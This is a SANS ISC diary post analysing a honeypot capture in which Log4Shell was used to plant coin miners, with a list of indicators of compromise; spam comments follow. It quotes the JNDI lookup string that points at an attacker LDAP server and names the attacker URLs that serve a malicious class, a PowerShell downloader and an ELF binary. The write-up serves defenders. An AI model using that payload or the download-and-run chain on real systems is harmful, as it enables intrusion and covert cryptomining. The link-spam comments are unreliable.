ISC Stormcast For Monday, December 13th, 2021 https://isc.sans.edu/podcastdetail.html?id=7792

Log4Shell exploited to implant coin miners

Published: 2021-12-13
Last Updated: 2021-12-13 01:31:37 UTC
by Renato Marinho (Version: 1)
1 comment(s)

Analyzing the ISC honeypots' requests, I found out that coin miners just included Log4Shell into their arsenal. 

The request that hit our honeypot is trying to make vulnerable log4j load the address 'jndi:ldap://45[.]83.193.150:1389/Exploit'. This will make log4j load and instantiate a malicious payload hosted at 'http://31[.]220.58.29/Exploit.class'.

I could find the payload address by doing a JNDI lookup, just like log4j does, then getting the class name and address by the returned reference object. To do so, I created a simple tool that is available on GitHub

After decompiling the malicious class using fernflower, I could see the following code.

Depending on the targeted operating system, the code will download and execute codes hosted on different locations.

At http://172[.]105.241.146:80/wp-content/themes/twentysixteen/s.cmd, which will be loaded in the case of Windows SO, there is a Powershell script to download and execute a coin miner, as seen below.

For not Windows operating systems, the malicious class will download and execute an ELF binary hosted at http://18[.]228.7.109/.log/log. Although I suspect it's also a coin miner, the ELF file is yet to be analyzed.

Bojan and Johannes wrote about Log4Shell here and here, respectively. 

IOCs

Network

ldap://45[.]83.193.150
http://31[.]220.58.29
http://172[.]105.241.146
http://18[.]228.7.109

 

Files (MD5 and SHA256 hashes)

ceb9a55eaa71101f86b14c6b296066c9  pty3
4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c  pty3

f6e51ea341570c6e9e4c97aee082822b  Exploit.class
eb76b7fb22dd442ba7d5064dce4cec79e6db745ace7019b6dfe5642782bf8660  Exploit.class

c717c47941c150f867ce6a62ed0d2d35  xmrig.exe
e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1  xmrig.exe

1718956642fbd382e9cde0c6034f0e21  s.cmd
c70e6f8edfca4be3ca0dc2cfac8fddd14804b7e1e3c496214d09c6798b4620c5  s.cmd

--
Renato Marinho
Morphus Labs| LinkedIn|Twitter

Keywords:
1 comment(s)

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives